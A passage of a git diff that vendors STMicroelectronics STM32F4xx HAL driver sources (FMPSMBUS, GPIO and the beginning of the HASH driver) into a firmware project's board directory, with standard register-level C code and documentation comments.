FMPI2C_CR2_RD_WRN_Pos))) | \ + FMPI2C_CR2_START | FMPI2C_CR2_STOP | FMPI2C_CR2_PECBYTE)), \ + (uint32_t)(((uint32_t)DevAddress & FMPI2C_CR2_SADD) | \ + (((uint32_t)Size << FMPI2C_CR2_NBYTES_Pos) & FMPI2C_CR2_NBYTES) | \ + (uint32_t)Mode | (uint32_t)Request)); +} + +/** + * @brief Convert FMPSMBUSx OTHER_xxx XferOptions to functional XferOptions. + * @param hfmpsmbus FMPSMBUS handle. + * @retval None + */ +static void FMPSMBUS_ConvertOtherXferOptions(FMPSMBUS_HandleTypeDef *hfmpsmbus) +{ + /* if user set XferOptions to FMPSMBUS_OTHER_FRAME_NO_PEC */ + /* it request implicitly to generate a restart condition */ + /* set XferOptions to FMPSMBUS_FIRST_FRAME */ + if (hfmpsmbus->XferOptions == FMPSMBUS_OTHER_FRAME_NO_PEC) + { + hfmpsmbus->XferOptions = FMPSMBUS_FIRST_FRAME; + } + /* else if user set XferOptions to FMPSMBUS_OTHER_FRAME_WITH_PEC */ + /* it request implicitly to generate a restart condition */ + /* set XferOptions to FMPSMBUS_FIRST_FRAME | FMPSMBUS_SENDPEC_MODE */ + else if (hfmpsmbus->XferOptions == FMPSMBUS_OTHER_FRAME_WITH_PEC) + { + hfmpsmbus->XferOptions = FMPSMBUS_FIRST_FRAME | FMPSMBUS_SENDPEC_MODE; + } + /* else if user set XferOptions to FMPSMBUS_OTHER_AND_LAST_FRAME_NO_PEC */ + /* it request implicitly to generate a restart condition */ + /* then generate a stop condition at the end of transfer */ + /* set XferOptions to FMPSMBUS_FIRST_AND_LAST_FRAME_NO_PEC */ + else if (hfmpsmbus->XferOptions == FMPSMBUS_OTHER_AND_LAST_FRAME_NO_PEC) + { + hfmpsmbus->XferOptions = FMPSMBUS_FIRST_AND_LAST_FRAME_NO_PEC; + } + /* else if user set XferOptions to FMPSMBUS_OTHER_AND_LAST_FRAME_WITH_PEC */ + /* it request implicitly to generate a restart condition */ + /* then generate a stop condition at the end of transfer */ + /* set XferOptions to FMPSMBUS_FIRST_AND_LAST_FRAME_WITH_PEC */ + else if (hfmpsmbus->XferOptions == FMPSMBUS_OTHER_AND_LAST_FRAME_WITH_PEC) + { + hfmpsmbus->XferOptions = FMPSMBUS_FIRST_AND_LAST_FRAME_WITH_PEC; + } + else + { + /* Nothing to do */ + } +} +/** + * @} + */ + +#endif /* FMPI2C_CR1_PE */ +#endif /* HAL_FMPSMBUS_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpsmbus_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpsmbus_ex.c new file mode 100644 index 000000000..e5147ca66 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_fmpsmbus_ex.c @@ -0,0 +1,148 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_fmpsmbus_ex.c + * @author MCD Application Team + * @brief FMPSMBUS Extended HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of FMPSMBUS Extended peripheral: + * + Extended features functions + * + @verbatim + ============================================================================== + ##### FMPSMBUS peripheral Extended features ##### + ============================================================================== + + [..] Comparing to other previous devices, the FMPSMBUS interface for STM32F4xx + devices contains the following additional features + + (+) Disable or enable Fast Mode Plus + + ##### How to use this driver ##### + ============================================================================== + (#) Configure the enable or disable of fast mode plus driving capability using the functions : + (++) HAL_FMPSMBUSEx_EnableFastModePlus() + (++) HAL_FMPSMBUSEx_DisableFastModePlus() + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FMPSMBUSEx FMPSMBUSEx + * @brief FMPSMBUS Extended HAL module driver + * @{ + */ + +#ifdef HAL_FMPSMBUS_MODULE_ENABLED +#if defined(FMPI2C_CR1_PE) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup FMPSMBUSEx_Exported_Functions FMPSMBUS Extended Exported Functions + * @{ + */ + +/** @defgroup FMPSMBUSEx_Exported_Functions_Group3 Fast Mode Plus Functions + * @brief Fast Mode Plus Functions + * +@verbatim + =============================================================================== + ##### Fast Mode Plus Functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure Fast Mode Plus + +@endverbatim + * @{ + */ + +/** + * @brief Enable the FMPSMBUS fast mode plus driving capability. + * @param ConfigFastModePlus Selects the pin. + * This parameter can be one of the @ref FMPSMBUSEx_FastModePlus values + * @note For FMPI2C1, fast mode plus driving capability can be enabled on all selected + * FMPI2C1 pins using FMPSMBUS_FASTMODEPLUS_FMPI2C1 parameter or independently + * on each one of the following pins PB6, PB7, PB8 and PB9. + * @note For remaining FMPI2C1 pins (PA14, PA15...) fast mode plus driving capability + * can be enabled only by using FMPSMBUS_FASTMODEPLUS_FMPI2C1 parameter. + * @retval None + */ +void HAL_FMPSMBUSEx_EnableFastModePlus(uint32_t ConfigFastModePlus) +{ + /* Check the parameter */ + assert_param(IS_FMPSMBUS_FASTMODEPLUS(ConfigFastModePlus)); + + /* Enable SYSCFG clock */ + __HAL_RCC_SYSCFG_CLK_ENABLE(); + + /* Enable fast mode plus driving capability for selected pin */ + SET_BIT(SYSCFG->CFGR, (uint32_t)ConfigFastModePlus); +} + +/** + * @brief Disable the FMPSMBUS fast mode plus driving capability. + * @param ConfigFastModePlus Selects the pin. + * This parameter can be one of the @ref FMPSMBUSEx_FastModePlus values + * @note For FMPI2C1, fast mode plus driving capability can be disabled on all selected + * FMPI2C1 pins using FMPSMBUS_FASTMODEPLUS_FMPI2C1 parameter or independently + * on each one of the following pins PB6, PB7, PB8 and PB9. + * @note For remaining FMPI2C1 pins (PA14, PA15...) fast mode plus driving capability + * can be disabled only by using FMPSMBUS_FASTMODEPLUS_FMPI2C1 parameter. + * @retval None + */ +void HAL_FMPSMBUSEx_DisableFastModePlus(uint32_t ConfigFastModePlus) +{ + /* Check the parameter */ + assert_param(IS_FMPSMBUS_FASTMODEPLUS(ConfigFastModePlus)); + + /* Enable SYSCFG clock */ + __HAL_RCC_SYSCFG_CLK_ENABLE(); + + /* Disable fast mode plus driving capability for selected pin */ + CLEAR_BIT(SYSCFG->CFGR, (uint32_t)ConfigFastModePlus); +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* FMPI2C_CR1_PE */ +#endif /* HAL_FMPSMBUS_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_gpio.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_gpio.c new file mode 100644 index 000000000..47203391f --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_gpio.c @@ -0,0 +1,534 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_gpio.c + * @author MCD Application Team + * @brief GPIO HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the General Purpose Input/Output (GPIO) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + @verbatim + ============================================================================== + ##### GPIO Peripheral features ##### + ============================================================================== + [..] + Subject to the specific hardware characteristics of each I/O port listed in the datasheet, each + port bit of the General Purpose IO (GPIO) Ports, can be individually configured by software + in several modes: + (+) Input mode + (+) Analog mode + (+) Output mode + (+) Alternate function mode + (+) External interrupt/event lines + + [..] + During and just after reset, the alternate functions and external interrupt + lines are not active and the I/O ports are configured in input floating mode. + + [..] + All GPIO pins have weak internal pull-up and pull-down resistors, which can be + activated or not. + + [..] + In Output or Alternate mode, each IO can be configured on open-drain or push-pull + type and the IO speed can be selected depending on the VDD value. + + [..] + All ports have external interrupt/event capability. To use external interrupt + lines, the port must be configured in input mode. All available GPIO pins are + connected to the 16 external interrupt/event lines from EXTI0 to EXTI15. + + [..] + The external interrupt/event controller consists of up to 23 edge detectors + (16 lines are connected to GPIO) for generating event/interrupt requests (each + input line can be independently configured to select the type (interrupt or event) + and the corresponding trigger event (rising or falling or both). Each line can + also be masked independently. + + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Enable the GPIO AHB clock using the following function: __HAL_RCC_GPIOx_CLK_ENABLE(). + + (#) Configure the GPIO pin(s) using HAL_GPIO_Init(). + (++) Configure the IO mode using "Mode" member from GPIO_InitTypeDef structure + (++) Activate Pull-up, Pull-down resistor using "Pull" member from GPIO_InitTypeDef + structure. + (++) In case of Output or alternate function mode selection: the speed is + configured through "Speed" member from GPIO_InitTypeDef structure. + (++) In alternate mode is selection, the alternate function connected to the IO + is configured through "Alternate" member from GPIO_InitTypeDef structure. + (++) Analog mode is required when a pin is to be used as ADC channel + or DAC output. + (++) In case of external interrupt/event selection the "Mode" member from + GPIO_InitTypeDef structure select the type (interrupt or event) and + the corresponding trigger event (rising or falling or both). + + (#) In case of external interrupt/event mode selection, configure NVIC IRQ priority + mapped to the EXTI line using HAL_NVIC_SetPriority() and enable it using + HAL_NVIC_EnableIRQ(). + + (#) To get the level of a pin configured in input mode use HAL_GPIO_ReadPin(). + + (#) To set/reset the level of a pin configured in output mode use + HAL_GPIO_WritePin()/HAL_GPIO_TogglePin(). + + (#) To lock pin configuration until next reset use HAL_GPIO_LockPin(). + + + (#) During and just after reset, the alternate functions are not + active and the GPIO pins are configured in input floating mode (except JTAG + pins). + + (#) The LSE oscillator pins OSC32_IN and OSC32_OUT can be used as general purpose + (PC14 and PC15, respectively) when the LSE oscillator is off. The LSE has + priority over the GPIO function. + + (#) The HSE oscillator pins OSC_IN/OSC_OUT can be used as + general purpose PH0 and PH1, respectively, when the HSE oscillator is off. + The HSE has priority over the GPIO function. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup GPIO GPIO + * @brief GPIO HAL module driver + * @{ + */ + +#ifdef HAL_GPIO_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup GPIO_Private_Constants GPIO Private Constants + * @{ + */ + +#define GPIO_NUMBER 16U +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup GPIO_Exported_Functions GPIO Exported Functions + * @{ + */ + +/** @defgroup GPIO_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] + This section provides functions allowing to initialize and de-initialize the GPIOs + to be ready for use. + +@endverbatim + * @{ + */ + + +/** + * @brief Initializes the GPIOx peripheral according to the specified parameters in the GPIO_Init. + * @param GPIOx where x can be (A..K) to select the GPIO peripheral for STM32F429X device or + * x can be (A..I) to select the GPIO peripheral for STM32F40XX and STM32F427X devices. + * @param GPIO_Init pointer to a GPIO_InitTypeDef structure that contains + * the configuration information for the specified GPIO peripheral. + * @retval None + */ +void HAL_GPIO_Init(GPIO_TypeDef *GPIOx, GPIO_InitTypeDef *GPIO_Init) +{ + uint32_t position; + uint32_t ioposition = 0x00U; + uint32_t iocurrent = 0x00U; + uint32_t temp = 0x00U; + + /* Check the parameters */ + assert_param(IS_GPIO_ALL_INSTANCE(GPIOx)); + assert_param(IS_GPIO_PIN(GPIO_Init->Pin)); + assert_param(IS_GPIO_MODE(GPIO_Init->Mode)); + + /* Configure the port pins */ + for(position = 0U; position < GPIO_NUMBER; position++) + { + /* Get the IO position */ + ioposition = 0x01U << position; + /* Get the current IO position */ + iocurrent = (uint32_t)(GPIO_Init->Pin) & ioposition; + + if(iocurrent == ioposition) + { + /*--------------------- GPIO Mode Configuration ------------------------*/ + /* In case of Output or Alternate function mode selection */ + if(((GPIO_Init->Mode & GPIO_MODE) == MODE_OUTPUT) || \ + (GPIO_Init->Mode & GPIO_MODE) == MODE_AF) + { + /* Check the Speed parameter */ + assert_param(IS_GPIO_SPEED(GPIO_Init->Speed)); + /* Configure the IO Speed */ + temp = GPIOx->OSPEEDR; + temp &= ~(GPIO_OSPEEDER_OSPEEDR0 << (position * 2U)); + temp |= (GPIO_Init->Speed << (position * 2U)); + GPIOx->OSPEEDR = temp; + + /* Configure the IO Output Type */ + temp = GPIOx->OTYPER; + temp &= ~(GPIO_OTYPER_OT_0 << position) ; + temp |= (((GPIO_Init->Mode & OUTPUT_TYPE) >> OUTPUT_TYPE_Pos) << position); + GPIOx->OTYPER = temp; + } + + if((GPIO_Init->Mode & GPIO_MODE) != MODE_ANALOG) + { + /* Check the parameters */ + assert_param(IS_GPIO_PULL(GPIO_Init->Pull)); + + /* Activate the Pull-up or Pull down resistor for the current IO */ + temp = GPIOx->PUPDR; + temp &= ~(GPIO_PUPDR_PUPDR0 << (position * 2U)); + temp |= ((GPIO_Init->Pull) << (position * 2U)); + GPIOx->PUPDR = temp; + } + + /* In case of Alternate function mode selection */ + if((GPIO_Init->Mode & GPIO_MODE) == MODE_AF) + { + /* Check the Alternate function parameter */ + assert_param(IS_GPIO_AF(GPIO_Init->Alternate)); + /* Configure Alternate function mapped with the current IO */ + temp = GPIOx->AFR[position >> 3U]; + temp &= ~(0xFU << ((uint32_t)(position & 0x07U) * 4U)) ; + temp |= ((uint32_t)(GPIO_Init->Alternate) << (((uint32_t)position & 0x07U) * 4U)); + GPIOx->AFR[position >> 3U] = temp; + } + + /* Configure IO Direction mode (Input, Output, Alternate or Analog) */ + temp = GPIOx->MODER; + temp &= ~(GPIO_MODER_MODER0 << (position * 2U)); + temp |= ((GPIO_Init->Mode & GPIO_MODE) << (position * 2U)); + GPIOx->MODER = temp; + + /*--------------------- EXTI Mode Configuration ------------------------*/ + /* Configure the External Interrupt or event for the current IO */ + if((GPIO_Init->Mode & EXTI_MODE) != 0x00U) + { + /* Enable SYSCFG Clock */ + __HAL_RCC_SYSCFG_CLK_ENABLE(); + + temp = SYSCFG->EXTICR[position >> 2U]; + temp &= ~(0x0FU << (4U * (position & 0x03U))); + temp |= ((uint32_t)(GPIO_GET_INDEX(GPIOx)) << (4U * (position & 0x03U))); + SYSCFG->EXTICR[position >> 2U] = temp; + + /* Clear EXTI line configuration */ + temp = EXTI->IMR; + temp &= ~((uint32_t)iocurrent); + if((GPIO_Init->Mode & EXTI_IT) != 0x00U) + { + temp |= iocurrent; + } + EXTI->IMR = temp; + + temp = EXTI->EMR; + temp &= ~((uint32_t)iocurrent); + if((GPIO_Init->Mode & EXTI_EVT) != 0x00U) + { + temp |= iocurrent; + } + EXTI->EMR = temp; + + /* Clear Rising Falling edge configuration */ + temp = EXTI->RTSR; + temp &= ~((uint32_t)iocurrent); + if((GPIO_Init->Mode & TRIGGER_RISING) != 0x00U) + { + temp |= iocurrent; + } + EXTI->RTSR = temp; + + temp = EXTI->FTSR; + temp &= ~((uint32_t)iocurrent); + if((GPIO_Init->Mode & TRIGGER_FALLING) != 0x00U) + { + temp |= iocurrent; + } + EXTI->FTSR = temp; + } + } + } +} + +/** + * @brief De-initializes the GPIOx peripheral registers to their default reset values. + * @param GPIOx where x can be (A..K) to select the GPIO peripheral for STM32F429X device or + * x can be (A..I) to select the GPIO peripheral for STM32F40XX and STM32F427X devices. + * @param GPIO_Pin specifies the port bit to be written. + * This parameter can be one of GPIO_PIN_x where x can be (0..15). + * @retval None + */ +void HAL_GPIO_DeInit(GPIO_TypeDef *GPIOx, uint32_t GPIO_Pin) +{ + uint32_t position; + uint32_t ioposition = 0x00U; + uint32_t iocurrent = 0x00U; + uint32_t tmp = 0x00U; + + /* Check the parameters */ + assert_param(IS_GPIO_ALL_INSTANCE(GPIOx)); + + /* Configure the port pins */ + for(position = 0U; position < GPIO_NUMBER; position++) + { + /* Get the IO position */ + ioposition = 0x01U << position; + /* Get the current IO position */ + iocurrent = (GPIO_Pin) & ioposition; + + if(iocurrent == ioposition) + { + /*------------------------- EXTI Mode Configuration --------------------*/ + tmp = SYSCFG->EXTICR[position >> 2U]; + tmp &= (0x0FU << (4U * (position & 0x03U))); + if(tmp == ((uint32_t)(GPIO_GET_INDEX(GPIOx)) << (4U * (position & 0x03U)))) + { + /* Clear EXTI line configuration */ + EXTI->IMR &= ~((uint32_t)iocurrent); + EXTI->EMR &= ~((uint32_t)iocurrent); + + /* Clear Rising Falling edge configuration */ + EXTI->RTSR &= ~((uint32_t)iocurrent); + EXTI->FTSR &= ~((uint32_t)iocurrent); + + /* Configure the External Interrupt or event for the current IO */ + tmp = 0x0FU << (4U * (position & 0x03U)); + SYSCFG->EXTICR[position >> 2U] &= ~tmp; + } + + /*------------------------- GPIO Mode Configuration --------------------*/ + /* Configure IO Direction in Input Floating Mode */ + GPIOx->MODER &= ~(GPIO_MODER_MODER0 << (position * 2U)); + + /* Configure the default Alternate Function in current IO */ + GPIOx->AFR[position >> 3U] &= ~(0xFU << ((uint32_t)(position & 0x07U) * 4U)) ; + + /* Deactivate the Pull-up and Pull-down resistor for the current IO */ + GPIOx->PUPDR &= ~(GPIO_PUPDR_PUPDR0 << (position * 2U)); + + /* Configure the default value IO Output Type */ + GPIOx->OTYPER &= ~(GPIO_OTYPER_OT_0 << position) ; + + /* Configure the default value for IO Speed */ + GPIOx->OSPEEDR &= ~(GPIO_OSPEEDER_OSPEEDR0 << (position * 2U)); + } + } +} + +/** + * @} + */ + +/** @defgroup GPIO_Exported_Functions_Group2 IO operation functions + * @brief GPIO Read and Write + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + +@endverbatim + * @{ + */ + +/** + * @brief Reads the specified input port pin. + * @param GPIOx where x can be (A..K) to select the GPIO peripheral for STM32F429X device or + * x can be (A..I) to select the GPIO peripheral for STM32F40XX and STM32F427X devices. + * @param GPIO_Pin specifies the port bit to read. + * This parameter can be GPIO_PIN_x where x can be (0..15). + * @retval The input port pin value. + */ +GPIO_PinState HAL_GPIO_ReadPin(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin) +{ + GPIO_PinState bitstatus; + + /* Check the parameters */ + assert_param(IS_GPIO_PIN(GPIO_Pin)); + + if((GPIOx->IDR & GPIO_Pin) != (uint32_t)GPIO_PIN_RESET) + { + bitstatus = GPIO_PIN_SET; + } + else + { + bitstatus = GPIO_PIN_RESET; + } + return bitstatus; +} + +/** + * @brief Sets or clears the selected data port bit. + * + * @note This function uses GPIOx_BSRR register to allow atomic read/modify + * accesses. In this way, there is no risk of an IRQ occurring between + * the read and the modify access. + * + * @param GPIOx where x can be (A..K) to select the GPIO peripheral for STM32F429X device or + * x can be (A..I) to select the GPIO peripheral for STM32F40XX and STM32F427X devices. + * @param GPIO_Pin specifies the port bit to be written. + * This parameter can be one of GPIO_PIN_x where x can be (0..15). + * @param PinState specifies the value to be written to the selected bit. + * This parameter can be one of the GPIO_PinState enum values: + * @arg GPIO_PIN_RESET: to clear the port pin + * @arg GPIO_PIN_SET: to set the port pin + * @retval None + */ +void HAL_GPIO_WritePin(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin, GPIO_PinState PinState) +{ + /* Check the parameters */ + assert_param(IS_GPIO_PIN(GPIO_Pin)); + assert_param(IS_GPIO_PIN_ACTION(PinState)); + + if(PinState != GPIO_PIN_RESET) + { + GPIOx->BSRR = GPIO_Pin; + } + else + { + GPIOx->BSRR = (uint32_t)GPIO_Pin << 16U; + } +} + +/** + * @brief Toggles the specified GPIO pins. + * @param GPIOx Where x can be (A..K) to select the GPIO peripheral for STM32F429X device or + * x can be (A..I) to select the GPIO peripheral for STM32F40XX and STM32F427X devices. + * @param GPIO_Pin Specifies the pins to be toggled. + * @retval None + */ +void HAL_GPIO_TogglePin(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin) +{ + uint32_t odr; + + /* Check the parameters */ + assert_param(IS_GPIO_PIN(GPIO_Pin)); + + /* get current Ouput Data Register value */ + odr = GPIOx->ODR; + + /* Set selected pins that were at low level, and reset ones that were high */ + GPIOx->BSRR = ((odr & GPIO_Pin) << GPIO_NUMBER) | (~odr & GPIO_Pin); +} + +/** + * @brief Locks GPIO Pins configuration registers. + * @note The locked registers are GPIOx_MODER, GPIOx_OTYPER, GPIOx_OSPEEDR, + * GPIOx_PUPDR, GPIOx_AFRL and GPIOx_AFRH. + * @note The configuration of the locked GPIO pins can no longer be modified + * until the next reset. + * @param GPIOx where x can be (A..F) to select the GPIO peripheral for STM32F4 family + * @param GPIO_Pin specifies the port bit to be locked. + * This parameter can be any combination of GPIO_PIN_x where x can be (0..15). + * @retval None + */ +HAL_StatusTypeDef HAL_GPIO_LockPin(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin) +{ + __IO uint32_t tmp = GPIO_LCKR_LCKK; + + /* Check the parameters */ + assert_param(IS_GPIO_PIN(GPIO_Pin)); + + /* Apply lock key write sequence */ + tmp |= GPIO_Pin; + /* Set LCKx bit(s): LCKK='1' + LCK[15-0] */ + GPIOx->LCKR = tmp; + /* Reset LCKx bit(s): LCKK='0' + LCK[15-0] */ + GPIOx->LCKR = GPIO_Pin; + /* Set LCKx bit(s): LCKK='1' + LCK[15-0] */ + GPIOx->LCKR = tmp; + /* Read LCKR register. This read is mandatory to complete key lock sequence */ + tmp = GPIOx->LCKR; + + /* Read again in order to confirm lock is active */ + if((GPIOx->LCKR & GPIO_LCKR_LCKK) != RESET) + { + return HAL_OK; + } + else + { + return HAL_ERROR; + } +} + +/** + * @brief This function handles EXTI interrupt request. + * @param GPIO_Pin Specifies the pins connected EXTI line + * @retval None + */ +void HAL_GPIO_EXTI_IRQHandler(uint16_t GPIO_Pin) +{ + /* EXTI line interrupt detected */ + if(__HAL_GPIO_EXTI_GET_IT(GPIO_Pin) != RESET) + { + __HAL_GPIO_EXTI_CLEAR_IT(GPIO_Pin); + HAL_GPIO_EXTI_Callback(GPIO_Pin); + } +} + +/** + * @brief EXTI line detection callbacks. + * @param GPIO_Pin Specifies the pins connected EXTI line + * @retval None + */ +__weak void HAL_GPIO_EXTI_Callback(uint16_t GPIO_Pin) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(GPIO_Pin); + /* NOTE: This function Should not be modified, when the callback is needed, + the HAL_GPIO_EXTI_Callback could be implemented in the user file + */ +} + +/** + * @} + */ + + +/** + * @} + */ + +#endif /* HAL_GPIO_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hash.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hash.c new file mode 100644 index 000000000..c901e19d6 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hash.c @@ -0,0 +1,3518 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_hash.c + * @author MCD Application Team + * @brief HASH HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the HASH peripheral: + * + Initialization and de-initialization methods + * + HASH or HMAC processing in polling mode + * + HASH or HMAC processing in interrupt mode + * + HASH or HMAC processing in DMA mode + * + Peripheral State methods + * + HASH or HMAC processing suspension/resumption + * + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + The HASH HAL driver can be used as follows: + + (#)Initialize the HASH low level resources by implementing the HAL_HASH_MspInit(): + (##) Enable the HASH interface clock using __HASH_CLK_ENABLE() + (##) When resorting to interrupt-based APIs (e.g. HAL_HASH_xxx_Start_IT()) + (+++) Configure the HASH interrupt priority using HAL_NVIC_SetPriority() + (+++) Enable the HASH IRQ handler using HAL_NVIC_EnableIRQ() + (+++) In HASH IRQ handler, call HAL_HASH_IRQHandler() API + (##) When resorting to DMA-based APIs (e.g. HAL_HASH_xxx_Start_DMA()) + (+++) Enable the DMAx interface clock using + __DMAx_CLK_ENABLE() + (+++) Configure and enable one DMA stream to manage data transfer from + memory to peripheral (input stream). Managing data transfer from + peripheral to memory can be performed only using CPU. + (+++) Associate the initialized DMA handle to the HASH DMA handle + using __HAL_LINKDMA() + (+++) Configure the priority and enable the NVIC for the transfer complete + interrupt on the DMA stream: use + HAL_NVIC_SetPriority() and + HAL_NVIC_EnableIRQ() + + (#)Initialize the HASH HAL using HAL_HASH_Init(). This function: + (##) resorts to HAL_HASH_MspInit() for low-level initialization, + (##) configures the data type: 1-bit, 8-bit, 16-bit or 32-bit. + + (#)Three processing schemes are available: + (##) Polling mode: processing APIs are blocking functions + i.e. they process the data and wait till the digest computation is finished, + e.g. HAL_HASH_xxx_Start() for HASH or HAL_HMAC_xxx_Start() for HMAC + (##) Interrupt mode: processing APIs are not blocking functions + i.e. they process the data under interrupt, + e.g. HAL_HASH_xxx_Start_IT() for HASH or HAL_HMAC_xxx_Start_IT() for HMAC + (##) DMA mode: processing APIs are not blocking functions and the CPU is + not used for data transfer i.e. the data transfer is ensured by DMA, + e.g. HAL_HASH_xxx_Start_DMA() for HASH or HAL_HMAC_xxx_Start_DMA() + for HMAC. Note that in DMA mode, a call to HAL_HASH_xxx_Finish() + is then required to retrieve the digest. + + (#)When the processing function is called after HAL_HASH_Init(), the HASH peripheral is + initialized and processes the buffer fed in input. When the input data have all been + fed to the Peripheral, the digest computation can start. + + (#)Multi-buffer processing is possible in polling, interrupt and DMA modes. + (##) In polling mode, only multi-buffer HASH processing is possible. + API HAL_HASH_xxx_Accumulate() must be called for each input buffer, except for the last one. + User must resort to HAL_HASH_xxx_Accumulate_End() to enter the last one and retrieve as + well the computed digest. + + (##) In interrupt mode, API HAL_HASH_xxx_Accumulate_IT() must be called for each input buffer, + except for the last one. + User must resort to HAL_HASH_xxx_Accumulate_End_IT() to enter the last one and retrieve as + well the computed digest. + + (##) In DMA mode, multi-buffer HASH and HMAC processing are possible. + (+++) HASH processing: once initialization is done, MDMAT bit must be set + through __HAL_HASH_SET_MDMAT() macro. + From that point, each buffer can be fed to the Peripheral through HAL_HASH_xxx_Start_DMA() API. + Before entering the last buffer, reset the MDMAT bit with __HAL_HASH_RESET_MDMAT() + macro then wrap-up the HASH processing in feeding the last input buffer through the + same API HAL_HASH_xxx_Start_DMA(). The digest can then be retrieved with a call to + API HAL_HASH_xxx_Finish(). + (+++) HMAC processing (requires to resort to extended functions): + after initialization, the key and the first input buffer are entered + in the Peripheral with the API HAL_HMACEx_xxx_Step1_2_DMA(). This carries out HMAC step 1 and + starts step 2. + The following buffers are next entered with the API HAL_HMACEx_xxx_Step2_DMA(). At this + point, the HMAC processing is still carrying out step 2. + Then, step 2 for the last input buffer and step 3 are carried out by a single call + to HAL_HMACEx_xxx_Step2_3_DMA(). + + The digest can finally be retrieved with a call to API HAL_HASH_xxx_Finish(). + + + (#)Context swapping. + (##) Two APIs are available to suspend HASH or HMAC processing: + (+++) HAL_HASH_SwFeed_ProcessSuspend() when data are entered by software (polling or IT mode), + (+++) HAL_HASH_DMAFeed_ProcessSuspend() when data are entered by DMA. + + (##) When HASH or HMAC processing is suspended, HAL_HASH_ContextSaving() allows + to save in memory the Peripheral context. This context can be restored afterwards + to resume the HASH processing thanks to HAL_HASH_ContextRestoring(). + + (##) Once the HASH Peripheral has been restored to the same configuration as that at suspension + time, processing can be restarted with the same API call (same API, same handle, + same parameters) as done before the suspension. Relevant parameters to restart at + the proper location are internally saved in the HASH handle. + + (#)Call HAL_HASH_DeInit() to deinitialize the HASH peripheral. + + *** Remarks on message length *** + =================================== + [..] + (#) HAL in interruption mode (interruptions driven) + + (##)Due to HASH peripheral hardware design, the peripheral interruption is triggered every 64 bytes. + This is why, for driver implementation simplicity’s sake, user is requested to enter a message the + length of which is a multiple of 4 bytes. + + (##) When the message length (in bytes) is not a multiple of words, a specific field exists in HASH_STR + to specify which bits to discard at the end of the complete message to process only the message bits + and not extra bits. + + (##) If user needs to perform a hash computation of a large input buffer that is spread around various places + in memory and where each piece of this input buffer is not necessarily a multiple of 4 bytes in size, it becomes + necessary to use a temporary buffer to format the data accordingly before feeding them to the Peripheral. + It is advised to the user to + (+++) achieve the first formatting operation by software then enter the data + (+++) while the Peripheral is processing the first input set, carry out the second formatting + operation by software, to be ready when DINIS occurs. + (+++) repeat step 2 until the whole message is processed. + + [..] + (#) HAL in DMA mode + + (##) Again, due to hardware design, the DMA transfer to feed the data can only be done on a word-basis. + The same field described above in HASH_STR is used to specify which bits to discard at the end of the + DMA transfer to process only the message bits and not extra bits. Due to hardware implementation, + this is possible only at the end of the complete message. When several DMA transfers are needed to + enter the message, this is not applicable at the end of the intermediary transfers. + + (##) Similarly to the 